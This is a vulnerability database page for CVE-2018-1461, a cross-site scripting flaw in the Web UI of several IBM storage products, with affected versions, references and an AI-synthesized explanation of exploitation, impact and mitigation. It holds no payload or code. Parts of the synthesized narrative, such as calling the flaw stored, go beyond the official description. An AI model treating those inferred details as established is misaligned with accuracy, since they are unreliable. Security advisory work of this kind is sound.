CVE-2018-1461
Description
IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ( 6.1, 6.2, 6.3, 6.4, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.6.1, 7.7, 7.7.1, 7.8, 7.8.1, 8.1, and 8.1.1) are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 140362.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stored cross-site scripting vulnerability in the Web UI of multiple IBM storage products allows an attacker to inject arbitrary JavaScript, potentially leading to credential disclosure.
Vulnerability
CVE-2018-1461 is a stored cross-site scripting (XSS) vulnerability in the Web UI of IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize, and IBM FlashSystem products running versions 6.1, 6.2, 6.3, 6.4, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.6.1, 7.7, 7.7.1, 7.8, 7.8.1, 8.1, and 8.1.1 [1][2][3]. The vulnerability allows users to embed arbitrary JavaScript code in the Web UI, altering the intended functionality [1][2][3].
Exploitation
An attacker with access to the Web UI can inject malicious JavaScript into input fields or other user-controllable areas that are later rendered to other users. The attacker does not need to be authenticated to the target system if the vulnerable input is reachable without authentication; however, the vulnerability is triggered when a victim user views the crafted page in a trusted session. No special privileges are required beyond the ability to submit input to the Web UI [1][2][3].
Impact
If a victim user views the maliciously crafted page, the injected JavaScript executes in the context of their session. This can lead to credential disclosure (e.g., session tokens or cookies) and other actions that the victim user could perform, potentially compromising the integrity and confidentiality of the storage management system [1][2][3].
Mitigation
IBM has released firmware updates to address this vulnerability. The advisory recommends upgrading to a fixed version; the exact fixed version numbers and release dates are provided in the IBM security bulletins [1][2][3]. Workarounds are not detailed in the available references. There is no indication that this CVE is listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
- Security Bulletin: Multiple vulnerabilities in IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products
- Security Bulletin: Multiple vulnerabilities affect the IBM FlashSystem model V840
- Security Bulletin: Multiple vulnerabilities affect the IBM FlashSystem models 840 and 900
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
12- Range: >=6.1, <=8.1.1
>=6.1, <=8.1.1+ 1 more
- (no CPE)range: >=6.1, <=8.1.1
- (no CPE)range: 6.1
- Range: >=6.1, <=8.1.1
- Range: 7.5
- IBM/Spectrum Virtualize for Public Cloudv5Range: 7.5
- IBM/Spectrum Virtualize Softwarev5Range: 7.5
- Range: 6.4
- Range: 7.1
- Range: 7.1
- Range: 6.1
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
5- www.ibm.com/support/docview.wssmitrex_refsource_CONFIRM
- www.ibm.com/support/docview.wssmitrex_refsource_CONFIRM
- www.ibm.com/support/docview.wssmitrex_refsource_CONFIRM
- www.securityfocus.com/bid/104349mitrevdb-entryx_refsource_BID
- exchange.xforce.ibmcloud.com/vulnerabilities/140362mitrevdb-entryx_refsource_XF
News mentions
0No linked articles in our index yet.